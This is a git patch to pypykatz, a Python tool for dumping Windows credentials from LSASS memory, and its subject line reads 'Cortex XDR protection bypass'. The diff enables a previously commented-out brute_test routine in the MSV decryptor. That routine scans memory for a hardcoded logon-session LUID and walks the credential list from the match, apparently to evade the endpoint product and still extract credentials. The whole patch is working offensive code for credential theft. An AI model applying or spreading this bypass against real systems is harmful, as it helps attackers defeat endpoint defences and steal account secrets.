From d671b5121d7b5ecbe2f13feaa08c8cb116a1ede6 Mon Sep 17 00:00:00 2001
From: Frank Bussink <frank.bussink@scrt.ch>
Date: Thu, 22 Dec 2022 17:19:19 +0100
Subject: [PATCH] Cortex XDR protection bypass

---
 .../lsadecryptor/packages/msv/decryptor.py    | 40 +++++++++----------
 1 file changed, 20 insertions(+), 20 deletions(-)

diff --git a/pypykatz/lsadecryptor/packages/msv/decryptor.py b/pypykatz/lsadecryptor/packages/msv/decryptor.py
index 284ae68..0980840 100644
--- a/pypykatz/lsadecryptor/packages/msv/decryptor.py
+++ b/pypykatz/lsadecryptor/packages/msv/decryptor.py
@@ -426,24 +426,24 @@ class MsvDecryptor(PackageDecryptor):
 			
 			self.walk_list(entry_ptr, self.add_entry)
 
-		#self.brute_test()
+		self.brute_test()
 	
-	#def brute_test(self):
-	#	from pypykatz.commons.win_datatypes import LUID
-	#	luid_int = 1138792
-	#	luid_bytes = luid_int.to_bytes(8, byteorder='little', signed=False)
-	#	needle_luid = LUID(io.BytesIO(luid_bytes)).value
-	#	offset = 0x70
-	#
-	#	for luid_pos in self.reader.find_all_global(luid_bytes):
-	#		self.reader.move(luid_pos - offset)
-	#		et = self.decryptor_template.list_entry(self.reader).finaltype
-	#		self.reader.move(luid_pos - offset)
-	#		test_ptr = et(self.reader)
-	#		if test_ptr.LocallyUniqueIdentifier == needle_luid:
-	#			print('HIT!')
-	#			entry_ptr = self.decryptor_template.list_entry(self.reader)
-	#			try:
-	#				self.walk_list(test_ptr.Flink, self.add_entry)
-	#			except Exception as e:
-	#				print('ERR! %s' % e)
\ No newline at end of file
+	def brute_test(self):
+		from pypykatz.commons.win_datatypes import LUID
+		luid_int = 1138792
+		luid_bytes = luid_int.to_bytes(8, byteorder='little', signed=False)
+		needle_luid = LUID(io.BytesIO(luid_bytes)).value
+		offset = 0x70
+	
+		for luid_pos in self.reader.find_all_global(luid_bytes):
+			self.reader.move(luid_pos - offset)
+			et = self.decryptor_template.list_entry(self.reader).finaltype
+			self.reader.move(luid_pos - offset)
+			test_ptr = et(self.reader)
+			if test_ptr.LocallyUniqueIdentifier == needle_luid:
+				print('HIT!')
+				entry_ptr = self.decryptor_template.list_entry(self.reader)
+				try:
+					self.walk_list(test_ptr.Flink, self.add_entry)
+				except Exception as e:
+					print('ERR! %s' % e)
\ No newline at end of file
-- 
2.25.1

